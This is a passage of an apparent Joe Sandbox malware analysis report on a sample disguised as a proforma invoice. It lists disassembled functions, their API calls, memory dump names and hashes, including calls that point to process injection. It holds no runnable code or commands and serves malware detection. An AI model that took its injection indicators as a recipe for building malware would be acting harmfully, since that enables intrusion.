                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397143404-0
                                                                                                                    • Opcode ID: 2790719ba6c59ba4e18e7ea8d3e19e69d6b7c76a02bdce0bf6f96d517e6fc632
                                                                                                                    • Instruction ID: 2c7811bc7a1a5347d4f6cace989e463c8449113e6f93e1d982aa07478fb72b4a
                                                                                                                    • Opcode Fuzzy Hash: 2790719ba6c59ba4e18e7ea8d3e19e69d6b7c76a02bdce0bf6f96d517e6fc632
                                                                                                                    • Instruction Fuzzy Hash: B4E08632541224B7D7611F54FD0DFCA7F19AF06760F114121FB15690E087B15A21979C
                                                                                                                    Function 002B8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 002B8D1B
                                                                                                                      • Part of subcall function 00272D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00279A24), ref: 00272D69
                                                                                                                      • Part of subcall function 00272D55: GetLastError.KERNEL32(00000000,?,00279A24), ref: 00272D7B
                                                                                                                    • _free.LIBCMT ref: 002B8D2C
                                                                                                                    • _free.LIBCMT ref: 002B8D3E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                    • Instruction ID: 58b7c4b593ddf60cda10d53df739c5247f5e3e46c9c161d87838ebb69861a652
                                                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                    • Instruction Fuzzy Hash: 3CE012B162161386CB34A979A940AD313DC4F58392718491EF44DD7186CE74F866C524
                                                                                                                    Function 0025A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CALL
                                                                                                                    • API String ID: 0-4196123274
                                                                                                                    • Opcode ID: 86efccd8a153274d55968799b003b0d5228ed9e6b3fdc5e7dd977966042da87b
                                                                                                                    • Instruction ID: 6add96563627af9adb3854dd8c40c5314fd9355f8601e1bfcb8d80b901b979bd
                                                                                                                    • Opcode Fuzzy Hash: 86efccd8a153274d55968799b003b0d5228ed9e6b3fdc5e7dd977966042da87b
                                                                                                                    • Instruction Fuzzy Hash: 78227A74528301CFCB25DF14C495A6AB7E1BF48305F14896DE88A8B361D771ECA9CF86
                                                                                                                    Function 00257A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                                                    • Instruction ID: 75782250cf6d574bcc4ee8ae0824563359f448ad76f55b9637892f559fb6c5ef
                                                                                                                    • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                                                    • Instruction Fuzzy Hash: E631C2B1624606AFC704DF68D8D1E69B3A9FF483207158629F819CB291EB70E934CB94
                                                                                                                    Function 002547D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsThemeActive.UXTHEME ref: 00254834
                                                                                                                      • Part of subcall function 0027336C: __lock.LIBCMT ref: 00273372
                                                                                                                      • Part of subcall function 0027336C: DecodePointer.KERNEL32(00000001,?,00254849,002A7C74), ref: 0027337E
                                                                                                                      • Part of subcall function 0027336C: EncodePointer.KERNEL32(?,?,00254849,002A7C74), ref: 00273389
                                                                                                                      • Part of subcall function 002548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00254915
                                                                                                                      • Part of subcall function 002548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0025492A
                                                                                                                      • Part of subcall function 00253B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00253B68
                                                                                                                      • Part of subcall function 00253B3A: IsDebuggerPresent.KERNEL32 ref: 00253B7A
                                                                                                                      • Part of subcall function 00253B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,003152F8,003152E0,?,?), ref: 00253BEB
                                                                                                                      • Part of subcall function 00253B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00253C6F
                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00254874
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1438897964-0
                                                                                                                    • Opcode ID: 44340e4a7215f50e75fae0cf4dea1ff6052cd9c0ff85b8fe7a78f86d7c2723bd
                                                                                                                    • Instruction ID: 34e22e2db0fe8031268c093c91faea61aeaed94eca75373ceb9bc4d087bc5d74
                                                                                                                    • Opcode Fuzzy Hash: 44340e4a7215f50e75fae0cf4dea1ff6052cd9c0ff85b8fe7a78f86d7c2723bd
                                                                                                                    • Instruction Fuzzy Hash: 5411C071924301DBD701EF69EC0994AFBE8EF99750F00891EF44587271DBB08559CF85
                                                                                                                    Function 00270DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0027571C: __FF_MSGBANNER.LIBCMT ref: 00275733
                                                                                                                      • Part of subcall function 0027571C: __NMSG_WRITE.LIBCMT ref: 0027573A
                                                                                                                      • Part of subcall function 0027571C: RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,00000000,?,?,?,00270DD3,?), ref: 0027575F
                                                                                                                    • std::exception::exception.LIBCMT ref: 00270DEC
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00270E01
                                                                                                                      • Part of subcall function 0027859B: RaiseException.KERNEL32(?,?,?,00309E78,00000000,?,?,?,?,00270E06,?,00309E78,?,00000001), ref: 002785F0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902256705-0
                                                                                                                    • Opcode ID: 4a8f41e57cc257fed0c3a8986334ea3049a0505273fcc349e1e59ac14c58d98f
                                                                                                                    • Instruction ID: b9cd0f055b7ee926c9be536df02c759108747363d1b67a81db110a9e8b8f2a69
                                                                                                                    • Opcode Fuzzy Hash: 4a8f41e57cc257fed0c3a8986334ea3049a0505273fcc349e1e59ac14c58d98f
                                                                                                                    • Instruction Fuzzy Hash: 10F0F43146031EE6CB20AAA5EC559DFB7ACDF05310F008426F90CA6181DFF09AB8CAD1
                                                                                                                    Function 002753A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28
                                                                                                                    • __lock_file.LIBCMT ref: 002753EB
                                                                                                                      • Part of subcall function 00276C11: __lock.LIBCMT ref: 00276C34
                                                                                                                    • __fclose_nolock.LIBCMT ref: 002753F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2800547568-0
                                                                                                                    • Opcode ID: 5180d652361b3cd958197e8ffd8e03be571e4319a4e0ffa88acb8b4b17c6826c
                                                                                                                    • Instruction ID: a01253b222738a62ffc7a0b588466017460a087cab97d83382ed0f8e971e2793
                                                                                                                    • Opcode Fuzzy Hash: 5180d652361b3cd958197e8ffd8e03be571e4319a4e0ffa88acb8b4b17c6826c
                                                                                                                    • Instruction Fuzzy Hash: A4F09671821B159AD7116F7598097AEB6A06F41374F20C249E42CAB1D1CFFC49515F52
                                                                                                                    Function 00C51165 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00C51923
                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C519B9
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C519DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2438371351-0
                                                                                                                    • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                    • Instruction ID: 98a4dc7adbbad8a7824f430e19d59fba901de12ff8965de59ff91fe51b79f78d
                                                                                                                    • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                    • Instruction Fuzzy Hash: E812EF24E14658C6EB24DF60D8507DEB232EF68301F1090E9950DEB7A4E77A4F85CF5A
                                                                                                                    Function 00270C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction ID: 17fc323251b9e008adee6123904f19aaf4202a7ebfecad3db6d15c6e327472f0
                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction Fuzzy Hash: 1131C370A10106DBC71ADF58C4C4A69FBA6FB59300B64C6AAE80ACB351D671EDE5DB80
                                                                                                                    Function 0028FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: e0e92ff8d531179f3e53d3e616d04ffb37b77f46f6d5797841ad50c25af31c77
                                                                                                                    • Instruction ID: ed55ee89bc1bae91a90d1f2af2b0b65a5f06aed5fcc0c39933ebe3c748651234
                                                                                                                    • Opcode Fuzzy Hash: e0e92ff8d531179f3e53d3e616d04ffb37b77f46f6d5797841ad50c25af31c77
                                                                                                                    • Instruction Fuzzy Hash: 30411774514341CFDB14DF14C484B1ABBE1BF49319F0989ACE99A8B762C332E859CF56
                                                                                                                    Function 00257B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: 5bbb6a6db4c41ac72993fe4b49b36fc398c80b89a4af3cb61758aec611d30b51
                                                                                                                    • Instruction ID: f61677337b3c77552a193081583f154a5e32235111f37260eea52790ccbe4b5c
                                                                                                                    • Opcode Fuzzy Hash: 5bbb6a6db4c41ac72993fe4b49b36fc398c80b89a4af3cb61758aec611d30b51
                                                                                                                    • Instruction Fuzzy Hash: 25213672A35A09EBDF10AF12F8417AA7BB8FB14351F22842FE846C5190EB7095F4CB05
                                                                                                                    Function 002706FE Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eb38f1e40c2d73bac2084b9b3cbe7e2f505631c201106345c54bdb1a4fc8cfaf
                                                                                                                    • Instruction ID: 407a5add53f776c187e4358ec3bc1aa503b682b3aa3d3c8517815b80bc283b67
                                                                                                                    • Opcode Fuzzy Hash: eb38f1e40c2d73bac2084b9b3cbe7e2f505631c201106345c54bdb1a4fc8cfaf
                                                                                                                    • Instruction Fuzzy Hash: 492129354183D2AFC7228B3498665E5BFE5DF83311F0484DEECD84AC96D170685BC786
                                                                                                                    Function 00254DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00254BEF
                                                                                                                      • Part of subcall function 0027525B: __wfsopen.LIBCMT ref: 00275266
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254E0F
                                                                                                                      • Part of subcall function 00254B6A: FreeLibrary.KERNEL32(00000000), ref: 00254BA4
                                                                                                                      • Part of subcall function 00254C70: _memmove.LIBCMT ref: 00254CBA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1396898556-0
                                                                                                                    • Opcode ID: 94eb2913d1f9d8fd3974e6cb14ddd331cfdcacbabe0b61d3316d6b589dbdd243
                                                                                                                    • Instruction ID: 2dfe0b25af9479f4b9f1fce8abf7ed96870326b056670d960efe9289d2a794f5
                                                                                                                    • Opcode Fuzzy Hash: 94eb2913d1f9d8fd3974e6cb14ddd331cfdcacbabe0b61d3316d6b589dbdd243
                                                                                                                    • Instruction Fuzzy Hash: 4A112731620205ABCF14BF70C817FADB7A4AF44709F108429FD42A71C1DAB09E699F58
                                                                                                                    Function 0028FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 8d5c00cdd40f94cd3fbb2cf231bc56a906eda14ae2c7e5e560e240f4c228c945
                                                                                                                    • Instruction ID: 3b6f9aca05205b4f3a862c5b574097ae597b0225b0302e673da0705e525589aa
                                                                                                                    • Opcode Fuzzy Hash: 8d5c00cdd40f94cd3fbb2cf231bc56a906eda14ae2c7e5e560e240f4c228c945
                                                                                                                    • Instruction Fuzzy Hash: 57213374928301DFCB14DF24C484B1ABBE1BF88316F048968F88A47722D731E868CF96
                                                                                                                    Function 00274863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __lock_file.LIBCMT ref: 002748A6
                                                                                                                      • Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2597487223-0
                                                                                                                    • Opcode ID: 142b017afd2e1069faf3f1a2163f165f47b2f7b1661fc3d17f42483eb3e0fd47
                                                                                                                    • Instruction ID: c66ae17dfaee8bb5e75f32ef6b91162170b587048b91dfcd7be619df45cd0f18
                                                                                                                    • Opcode Fuzzy Hash: 142b017afd2e1069faf3f1a2163f165f47b2f7b1661fc3d17f42483eb3e0fd47
                                                                                                                    • Instruction Fuzzy Hash: E7F0AF3196160AEBDF12BFB48C0E7AE76A0AF00325F15C514F42C9A191CBB88971DF52
                                                                                                                    Function 00254E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254E7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
